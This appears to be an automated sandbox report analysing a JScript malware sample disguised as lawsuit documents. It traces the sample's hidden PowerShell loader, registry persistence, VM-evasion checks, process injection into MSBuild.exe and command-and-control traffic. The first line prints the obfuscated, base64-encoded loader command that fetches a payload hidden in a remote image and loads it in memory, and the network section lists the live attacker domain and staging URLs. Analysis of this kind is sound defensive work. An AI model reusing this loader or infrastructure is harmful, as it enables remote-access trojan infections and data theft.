              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA0A28 push ecx; iretd 2_2_00007FFC3DAA0A46
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA6241 push eax; retf 2_2_00007FFC3DAA6291
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA018D push ds; iretd 2_2_00007FFC3DAA01B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA0987 push E95AF9D0h; ret 2_2_00007FFC3DAA09C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA5964 pushad ; ret 2_2_00007FFC3DAA5969
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA7563 push ebx; iretd 2_2_00007FFC3DAA756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA00ED push ds; iretd 2_2_00007FFC3DAA01B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA00BD pushad ; iretd 2_2_00007FFC3DAA00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA3C53 push ds; retf 2_2_00007FFC3DAA3CB2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA0327 pushad ; iretd 2_2_00007FFC3DAA0346
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA635D pushad ; iretd 2_2_00007FFC3DAA6391
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA0347 push esi; iretd 2_2_00007FFC3DAA0376
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA6292 push eax; retf 2_2_00007FFC3DAA6291
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAA6292 pushad ; iretd 2_2_00007FFC3DAA6391

              Boot Survival

              Source: Yara match File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTR
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\Users\Public\Downloads\fluctuous.js
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: Yara match File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTR
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 1480000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2EA0000 memory reserve | memory write watch
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 4EA0000 memory reserve | memory write watch
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4932
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4903
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 2008
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 7980
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920 Thread sleep time: -11990383647911201s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4488 Thread sleep count: 2008 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4488 Thread sleep time: -2008000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4488 Thread sleep count: 7980 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4488 Thread sleep time: -7980000s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: !vmware virtual s scsi disk device
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware svga
              Source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: `2microsoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxservice
              Source: powershell.exe, 00000002.00000002.1351076971.0000013DAC15E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware pointing device
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware sata
              Source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VirtualMachineDetector
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmsrvc
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: .metadata.xml!vmware virtual s scsi disk device
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware vmci bus device
              Source: powershell.exe, 00000002.00000002.1351076971.0000013DAC130000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWY
              Source: MSBuild.exe, 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: vmware
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware pointing device<Each value of the array must contain a valid file reference.
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware usb pointing device
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware s
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwarexD
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareArguments
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtools
              Source: powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: MSBuild.exe, 0000000B.00000002.2442368097.0000000005390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
              Source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: virtualmachinedetector
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi64_7776.amsi.csv, type: OTHER
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 412000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C37008
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '...
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = '...
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match | File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques grouped by tactic; the number in parentheses is the count the report attaches to a matched technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Scripting (32); Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job (1); Exploitation for Client Execution (1); PowerShell (2); Launchd; Scheduled Task
Persistence: Scheduled Task/Job (1); Scripting (32); Registry Run Keys / Startup Folder (11); DLL Side-Loading (1); Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (211); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (11); DLL Side-Loading (1); Network Logon Script; RC Scripts
Defense Evasion: Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (211); Obfuscated Files or Information (131); Software Packing (1); DLL Side-Loading (1)
Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (13)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Input Capture (1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (113); Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1674571 | Sample: Documentos_de_la_demanda_pe... | Start date: 26/04/2025 | Architecture: WINDOWS | Score: 100

Start
  Network: envio2333.duckdns.org (Uses dynamic DNS services); ia801700.us.archive.org; 2 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 16 other signatures
  -> wscript.exe started
     Signatures: JScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
     -> powershell.exe started
        Network: archive.org 207.241.224.2, 443, 49719 INTERNET-ARCHIVEUS United States; ia801700.us.archive.org 207.241.233.30, 443, 49720 INTERNET-ARCHIVEUS United States; cdn.discordapp.com 162.159.134.233, 443, 49723 CLOUDFLARENETUS United States
        Signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes
        -> MSBuild.exe started
           Network: envio2333.duckdns.org 146.70.50.42, 3030 TENET-1ZA United Kingdom
        -> cmd.exe started
           -> conhost.exe started
        -> conhost.exe started

Source | Detection | Scanner | Label
Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js | 31% | Virustotal |
SAMPLE | 100% | Joe Sandbox ML |
No Antivirus matches


Name | IP | Active | Malicious | Antivirus Detection | Reputation
envio2333.duckdns.org | 146.70.50.42 | true | true | | unknown
archive.org | 207.241.224.2 | true | false | | high
ia801700.us.archive.org | 207.241.233.30 | true | false | | high
cdn.discordapp.com | 162.159.134.233 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://ia801700.us.archive.org/6/items/new_image_20250413/new_image.jpg | false | | high
https://cdn.discordapp.com/attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex=680c5371&is=680b01f1&hm=db042c2e54e6549936afd1049d0288e71f75865cd36201bafae8579d5154155e& | false | | high
https://archive.org/download/new_image_20250413/new_image.jpg | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://cdn.discordapp.com | powershell.exe, 00000002.00000002.1288245604.0000013D95F00000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1313016368.0000013DA3DA3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1288245604.0000013D93D31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.discordapp.com | powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://t.me/xworm_v2 | MSBuild.exe, 0000000B.00000002.2432254374.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1288245604.0000013D93D31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.discordapp.com/attachments/1354116596150571255/1364986987232235683/ConvertedFile.txt?ex= | powershell.exe, 00000002.00000002.1288245604.0000013D95E27000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://archive.org | powershell.exe, 00000002.00000002.1288245604.0000013D93F55000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ia801700.us.archive.org | powershell.exe, 00000002.00000002.1288245604.0000013D9416B000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
207.241.233.30 | ia801700.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
207.241.224.2 | archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
146.70.50.42 | envio2333.duckdns.org | United Kingdom | 2018 | TENET-1ZA | true
162.159.134.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1674571
Start date and time: 2025-04-26 02:52:41 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 36s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (Javascript)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
